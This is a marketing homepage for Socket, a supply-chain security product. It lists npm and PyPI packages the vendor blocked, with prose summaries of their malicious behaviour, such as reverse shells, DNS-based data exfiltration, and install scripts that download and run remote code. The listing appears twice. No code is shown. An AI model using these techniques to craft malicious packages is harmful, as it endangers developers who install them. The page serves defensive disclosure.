🚀 Big News: Socket Acquires Coana to Bring Reachability Analysis to Every Appsec Team.Learn more
Socket
Book a DemoInstallSign in
Socket

Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.

Install GitHub AppBook a Demo

Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery

timmywil published 3.7.1

left-pad

stevemao published 1.3.0

react

react-bot published 19.1.0

We protect you from vulnerable and malicious packages

azure-graphrbac

4.6.7

Removed from npm

Blocked by Socket

Possible typosquat of azure - Explanation: The package 'azure-graphrbac' is labeled as a 'security holding package', which often indicates a placeholder to prevent typosquatting. The name 'azure-graphrbac' closely resembles legitimate Azure package naming conventions, which could confuse users. The maintainers list includes 'npm', which is not a specific known maintainer. Therefore, it is likely a typosquat.

Live on npm for 49 minutes before removal. Socket users were protected even while the package was live.

epm-rdpt-angularjs

1.0.6

by nishant57

Removed from npm

Blocked by Socket

The provided source code is highly malicious as it sets up a reverse shell, allowing unauthorized remote access and control over the system. This poses a severe security risk.

Live on npm for 1 hour and 7 minutes before removal. Socket users were protected even while the package was live.

llm-oracle

1.0.1

by josh.weavery

Live on npm

Blocked by Socket

The code is heavily obfuscated and performs suspicious activities such as copying a file to a system directory and executing it with elevated privileges. This behavior, combined with the obfuscation, suggests a high likelihood of malicious intent.

jcnpm-cli

1.0.0

by jeftlee

Removed from npm

Blocked by Socket

The 'commandSpawn' function is vulnerable to command injection and other shell-based exploits due to the lack of input validation and output sanitization. The package should be used with caution and additional security measures should be taken to mitigate the risk of shell-based exploits.

Live on npm for 9 hours and 35 minutes before removal. Socket users were protected even while the package was live.

qg-toolkit

1.0.13

Live on PyPI

Blocked by Socket

The script collects sensitive user information from the Discord API, including usernames, emails, and IDs, and saves it to a file without user consent. It automates interactions with Discord, including sending unsolicited messages to channels (spamming), and uses a captcha solving service to bypass security measures. The script contains hardcoded API keys and tokens, posing significant security risks if shared or leaked. Additionally, it includes obfuscated JavaScript code to manipulate local storage tokens, suggesting attempts to hijack or misuse user accounts.

@stripo/backend

276.0.20

by neversummer.69

Live on npm

Blocked by Socket

The script collects a wide range of information from the user's system, including OS details, network interfaces, and SSH files, and sends it to a remote server via DNS queries.

single-spa-workfront

1.0.9

by jr0ch17-workfront

Removed from npm

Blocked by Socket

The code is collecting and transmitting sensitive system and user data to an external server without user consent, which is indicative of malicious behavior. The use of HTTPS on port 80 is also suspicious. Immediate action is recommended to prevent potential data breaches.

Live on npm for 13 days, 13 hours and 17 minutes before removal. Socket users were protected even while the package was live.

ntm001-module

3.0.1

by ntm001

Removed from npm

Blocked by Socket

This install script poses a significant security risk as it downloads and executes a script from an untrusted source without any validation. This behavior is highly suspicious and likely malicious.

Live on npm for 22 minutes before removal. Socket users were protected even while the package was live.

curri-slack

0.0.7

Removed from npm

Blocked by Socket

The code exhibits behavior consistent with data exfiltration, sending sensitive system and project information to external servers. This indicates a high risk of malicious activity.

Live on npm for 6 minutes before removal. Socket users were protected even while the package was live.

vizi-dashboard

17.7.7

by itsme369

Removed from npm

Blocked by Socket

This module does not execute any code or perform any actual operations, but it contains a message that indicates the possibility of a code injection vulnerability. This could be a sign of a malicious actor attempting to exploit a vulnerability in the system.

Live on npm for 12 hours and 19 minutes before removal. Socket users were protected even while the package was live.

@epic-social/store

2.2.0

by svennergr2

Live on npm

Blocked by Socket

This code is highly suspicious and likely malicious. It collects sensitive system information and attempts to send it to an external server via DNS queries using the ping command. The hardcoded ID and use of Base64 encoding further indicate an attempt to obfuscate the data being sent. Immediate review and remediation are recommended.

videoads-util-capability-detection

1.0.8

by videoads-util-url-loader

Removed from npm

Blocked by Socket

The code exhibits malicious behavior by collecting and exfiltrating sensitive system information to a remote server, posing a significant security risk.

Live on npm for 1 day, 2 hours and 25 minutes before removal. Socket users were protected even while the package was live.

kasms

1.0.128

by psych0124

Removed from npm

Blocked by Socket

The code takes a base64 encoded string, decodes it, and evaluates it using the 'eval' function. This introduces a significant security risk as it allows arbitrary code execution. The code should be considered dangerous and should not be used.

Live on npm for 9 minutes before removal. Socket users were protected even while the package was live.

calc_ucadidayug

1.0.7

Removed from npm

Blocked by Socket

This script poses a high security risk as it downloads and executes a remote shell script. This behavior is commonly associated with malware and should be considered highly suspicious.

Live on npm for 43 minutes before removal. Socket users were protected even while the package was live.

com.unity.2d.common

9.0.6

by vishal_gouri

Removed from npm

Blocked by Socket

The code exhibits clear malicious behavior by exfiltrating system data to a suspicious domain. The hardcoded DNS server and the method of data transmission indicate a high risk of data theft and unauthorized access. The overall security posture of this code is extremely concerning.

Live on npm for 20 days, 17 hours and 1 minute before removal. Socket users were protected even while the package was live.

airbnb-dev

9.1.0

by jpdtest1

Removed from npm

Blocked by Socket

The code is designed to collect and transmit system information to external endpoints without user consent, which is indicative of malicious behavior. The hardcoded endpoints and the nature of the data being sent pose a significant security risk.

Live on npm for 18 hours and 24 minutes before removal. Socket users were protected even while the package was live.

xenon-quiver-lyp495

1.0.0

by afifaljafari112

Removed from npm

Blocked by Socket

The provided code imports several external libraries with unusual names and calls a function `functame` from each one. Without access to the contents of these libraries, it's impossible to determine if this code has malicious intent. The unusual names and lack of clear functionality explanation raise a potential red flag, but there is insufficient information to conclude definitively. This fragment could be benign or it could be a wrapper for malicious activities hidden in the libraries.

Live on npm for 56 days, 15 hours and 55 minutes before removal. Socket users were protected even while the package was live.

hydradx-ui

1.2.1

by hydra_dx_shiv

Removed from npm

Blocked by Socket

The script is likely malicious. It gathers extensive system information, including sensitive data, and sends it to an external server without consent. The presence of a hardcoded domain that is unrelated to the user or a known service is a strong indicator of a data exfiltration attempt.

tddzs1tg06

1.8.0

by tddzs1tg206

Removed from npm

Blocked by Socket

The code is suspicious as it retrieves update information from an unverified external source and uses 'execSync' to run shell commands, which could lead to remote code execution if the external content is compromised. Furthermore, the code attempts to forcibly update and reinstall packages which is not typical for secure update practices.

Live on npm for 4 hours and 11 minutes before removal. Socket users were protected even while the package was live.

dawgie

1.4.2

Live on PyPI

Blocked by Socket

The code has several serious security concerns including the use of unsafe serialization via pickle, untrusted command execution, and a lack of validation for network inputs. Given the potential for arbitrary code execution and system compromise, this code should not be used as is.

tiktok-coins-generator869

1.0.2

by sicrap

Removed from npm

Blocked by Socket

The code exhibits potentially malicious behavior such as unauthorized login attempts and content publishing, as well as obfuscation and hard-coded credentials. The overall security risk is high due to the presence of these factors.

Live on npm for 3 hours and 55 minutes before removal. Socket users were protected even while the package was live.

coinbase-utils

999.9.9

by amigomioteconsidero13

Removed from npm

Blocked by Socket

The code is designed to exfiltrate system information by sending it to an external domain via DNS queries. This is a clear indication of malicious behavior, as it involves unauthorized data transmission without user consent.

Live on npm for 4 hours and 30 minutes before removal. Socket users were protected even while the package was live.

sift-web-sdk

100.0.0

by torpa_test

Removed from npm

Blocked by Socket

The script downloads a file from a remote server and includes system information in the URL. This behavior is highly suspicious and potentially malicious.

Live on npm for 8 minutes before removal. Socket users were protected even while the package was live.

react-router-packages

3.5.0

by revengerali

Removed from npm

Blocked by Socket

This code fragment has a high security risk due to the potential privacy violation and the use of obfuscation. The code collects and sends potentially sensitive information to an unknown third-party server, which is a cause for concern. The use of a hidden property and the lack of an error handler also suggest that this code may be intentionally obfuscated. Caution should be exercised when using this code.

Live on npm for 4 days, 16 hours and 11 minutes before removal. Socket users were protected even while the package was live.

azure-graphrbac

12.24.1000

Removed from npm

Blocked by Socket

The code exhibits suspicious behavior by sending local machine data and potentially sensitive project information (package.json content) to remote servers. This indicates potential data exfiltration.

Live on npm for 29 minutes before removal. Socket users were protected even while the package was live.

azure-graphrbac

4.6.7

Removed from npm

Blocked by Socket

Possible typosquat of azure - Explanation: The package 'azure-graphrbac' is labeled as a 'security holding package', which often indicates a placeholder to prevent typosquatting. The name 'azure-graphrbac' closely resembles legitimate Azure package naming conventions, which could confuse users. The maintainers list includes 'npm', which is not a specific known maintainer. Therefore, it is likely a typosquat.

Live on npm for 49 minutes before removal. Socket users were protected even while the package was live.

epm-rdpt-angularjs

1.0.6

by nishant57

Removed from npm

Blocked by Socket

The provided source code is highly malicious as it sets up a reverse shell, allowing unauthorized remote access and control over the system. This poses a severe security risk.

Live on npm for 1 hour and 7 minutes before removal. Socket users were protected even while the package was live.

llm-oracle

1.0.1

by josh.weavery

Live on npm

Blocked by Socket

The code is heavily obfuscated and performs suspicious activities such as copying a file to a system directory and executing it with elevated privileges. This behavior, combined with the obfuscation, suggests a high likelihood of malicious intent.

jcnpm-cli

1.0.0

by jeftlee

Removed from npm

Blocked by Socket

The 'commandSpawn' function is vulnerable to command injection and other shell-based exploits due to the lack of input validation and output sanitization. The package should be used with caution and additional security measures should be taken to mitigate the risk of shell-based exploits.

Live on npm for 9 hours and 35 minutes before removal. Socket users were protected even while the package was live.

qg-toolkit

1.0.13

Live on PyPI

Blocked by Socket

The script collects sensitive user information from the Discord API, including usernames, emails, and IDs, and saves it to a file without user consent. It automates interactions with Discord, including sending unsolicited messages to channels (spamming), and uses a captcha solving service to bypass security measures. The script contains hardcoded API keys and tokens, posing significant security risks if shared or leaked. Additionally, it includes obfuscated JavaScript code to manipulate local storage tokens, suggesting attempts to hijack or misuse user accounts.

@stripo/backend

276.0.20

by neversummer.69

Live on npm

Blocked by Socket

The script collects a wide range of information from the user's system, including OS details, network interfaces, and SSH files, and sends it to a remote server via DNS queries.

single-spa-workfront

1.0.9

by jr0ch17-workfront

Removed from npm

Blocked by Socket

The code is collecting and transmitting sensitive system and user data to an external server without user consent, which is indicative of malicious behavior. The use of HTTPS on port 80 is also suspicious. Immediate action is recommended to prevent potential data breaches.

Live on npm for 13 days, 13 hours and 17 minutes before removal. Socket users were protected even while the package was live.

ntm001-module

3.0.1

by ntm001

Removed from npm

Blocked by Socket

This install script poses a significant security risk as it downloads and executes a script from an untrusted source without any validation. This behavior is highly suspicious and likely malicious.

Live on npm for 22 minutes before removal. Socket users were protected even while the package was live.

curri-slack

0.0.7

Removed from npm

Blocked by Socket

The code exhibits behavior consistent with data exfiltration, sending sensitive system and project information to external servers. This indicates a high risk of malicious activity.

Live on npm for 6 minutes before removal. Socket users were protected even while the package was live.

vizi-dashboard

17.7.7

by itsme369

Removed from npm

Blocked by Socket

This module does not execute any code or perform any actual operations, but it contains a message that indicates the possibility of a code injection vulnerability. This could be a sign of a malicious actor attempting to exploit a vulnerability in the system.

Live on npm for 12 hours and 19 minutes before removal. Socket users were protected even while the package was live.

@epic-social/store

2.2.0

by svennergr2

Live on npm

Blocked by Socket

This code is highly suspicious and likely malicious. It collects sensitive system information and attempts to send it to an external server via DNS queries using the ping command. The hardcoded ID and use of Base64 encoding further indicate an attempt to obfuscate the data being sent. Immediate review and remediation are recommended.

videoads-util-capability-detection

1.0.8

by videoads-util-url-loader

Removed from npm

Blocked by Socket

The code exhibits malicious behavior by collecting and exfiltrating sensitive system information to a remote server, posing a significant security risk.

Live on npm for 1 day, 2 hours and 25 minutes before removal. Socket users were protected even while the package was live.

kasms

1.0.128

by psych0124

Removed from npm

Blocked by Socket

The code takes a base64 encoded string, decodes it, and evaluates it using the 'eval' function. This introduces a significant security risk as it allows arbitrary code execution. The code should be considered dangerous and should not be used.

Live on npm for 9 minutes before removal. Socket users were protected even while the package was live.

calc_ucadidayug

1.0.7

Removed from npm

Blocked by Socket

This script poses a high security risk as it downloads and executes a remote shell script. This behavior is commonly associated with malware and should be considered highly suspicious.

Live on npm for 43 minutes before removal. Socket users were protected even while the package was live.

com.unity.2d.common

9.0.6

by vishal_gouri

Removed from npm

Blocked by Socket

The code exhibits clear malicious behavior by exfiltrating system data to a suspicious domain. The hardcoded DNS server and the method of data transmission indicate a high risk of data theft and unauthorized access. The overall security posture of this code is extremely concerning.

Live on npm for 20 days, 17 hours and 1 minute before removal. Socket users were protected even while the package was live.

airbnb-dev

9.1.0

by jpdtest1

Removed from npm

Blocked by Socket

The code is designed to collect and transmit system information to external endpoints without user consent, which is indicative of malicious behavior. The hardcoded endpoints and the nature of the data being sent pose a significant security risk.

Live on npm for 18 hours and 24 minutes before removal. Socket users were protected even while the package was live.

xenon-quiver-lyp495

1.0.0

by afifaljafari112

Removed from npm

Blocked by Socket

The provided code imports several external libraries with unusual names and calls a function `functame` from each one. Without access to the contents of these libraries, it's impossible to determine if this code has malicious intent. The unusual names and lack of clear functionality explanation raise a potential red flag, but there is insufficient information to conclude definitively. This fragment could be benign or it could be a wrapper for malicious activities hidden in the libraries.

Live on npm for 56 days, 15 hours and 55 minutes before removal. Socket users were protected even while the package was live.

hydradx-ui

1.2.1

by hydra_dx_shiv

Removed from npm

Blocked by Socket

The script is likely malicious. It gathers extensive system information, including sensitive data, and sends it to an external server without consent. The presence of a hardcoded domain that is unrelated to the user or a known service is a strong indicator of a data exfiltration attempt.

tddzs1tg06

1.8.0

by tddzs1tg206

Removed from npm

Blocked by Socket

The code is suspicious as it retrieves update information from an unverified external source and uses 'execSync' to run shell commands, which could lead to remote code execution if the external content is compromised. Furthermore, the code attempts to forcibly update and reinstall packages which is not typical for secure update practices.

Live on npm for 4 hours and 11 minutes before removal. Socket users were protected even while the package was live.

dawgie

1.4.2

Live on PyPI

Blocked by Socket

The code has several serious security concerns including the use of unsafe serialization via pickle, untrusted command execution, and a lack of validation for network inputs. Given the potential for arbitrary code execution and system compromise, this code should not be used as is.

tiktok-coins-generator869

1.0.2

by sicrap

Removed from npm

Blocked by Socket

The code exhibits potentially malicious behavior such as unauthorized login attempts and content publishing, as well as obfuscation and hard-coded credentials. The overall security risk is high due to the presence of these factors.

Live on npm for 3 hours and 55 minutes before removal. Socket users were protected even while the package was live.

coinbase-utils

999.9.9

by amigomioteconsidero13

Removed from npm

Blocked by Socket

The code is designed to exfiltrate system information by sending it to an external domain via DNS queries. This is a clear indication of malicious behavior, as it involves unauthorized data transmission without user consent.

Live on npm for 4 hours and 30 minutes before removal. Socket users were protected even while the package was live.

sift-web-sdk

100.0.0

by torpa_test

Removed from npm

Blocked by Socket

The script downloads a file from a remote server and includes system information in the URL. This behavior is highly suspicious and potentially malicious.

Live on npm for 8 minutes before removal. Socket users were protected even while the package was live.

react-router-packages

3.5.0

by revengerali

Removed from npm

Blocked by Socket

This code fragment has a high security risk due to the potential privacy violation and the use of obfuscation. The code collects and sends potentially sensitive information to an unknown third-party server, which is a cause for concern. The use of a hidden property and the lack of an error handler also suggest that this code may be intentionally obfuscated. Caution should be exercised when using this code.

Live on npm for 4 days, 16 hours and 11 minutes before removal. Socket users were protected even while the package was live.

azure-graphrbac

12.24.1000

Removed from npm

Blocked by Socket

The code exhibits suspicious behavior by sending local machine data and potentially sensitive project information (package.json content) to remote servers. This indicates potential data exfiltration.

Live on npm for 29 minutes before removal. Socket users were protected even while the package was live.

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Known malware

Possible typosquat attack

NPM Shrinkwrap

Git dependency

HTTP dependency

Suspicious Stars on GitHub

Protestware or potentially unwanted behavior

Unstable ownership

AI-detected potential malware

Obfuscated code

21 more alerts

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.

GitHub app screenshot

Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Even more developer love
Install GitHub AppRead the docs

Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Even more security team love
Book a DemoRead the blog

Why teams choose Socket

Pro-active security

Depend on Socket to prevent malicious open source dependencies from infiltrating your app.

Easy to install

Install the Socket GitHub App in just 2 clicks and get protected today.

Comprehensive open source protection

Block 70+ issues in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more.

Develop faster

Reduce work by surfacing actionable security information directly in GitHub. Empower developers to make better decisions.

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Dec 14, 2023

Hijacked cryptocurrency library adds malware

Widely-used library in cryptocurrency frontend was compromised to include wallet-draining code, following the hijacking of NPM account credentials via phishing.

Jan 06, 2022

Maintainer intentionally adds malware

Rogue maintainer sabotages his own open source package with 100M downloads/month, notably breaking Amazon's AWS SDK.

Nov 15, 2021

npm discovers a platform vulnerability allowing unauthorized publishing of any package

Attackers could publish new versions of any npm package without authorization for multiple years.

Oct 22, 2021

Hijacked package adds cryptominers and password-stealing malware

Multiple packages with 30M downloads/month are hijacked and publish malicious versions directly into the software supply chain.

Nov 26, 2018

Package hijacked adding organization specific backdoors

Obfuscated malware added to a dependency which targeted a single company, went undetected for over a week, and made it into their production build.

Ready to dive in?

Get protected by Socket with just 2 clicks.

Install GitHub AppBook a Demo

The latest from the Socket team

Get our latest security research, open source insights, and product updates.

View all articles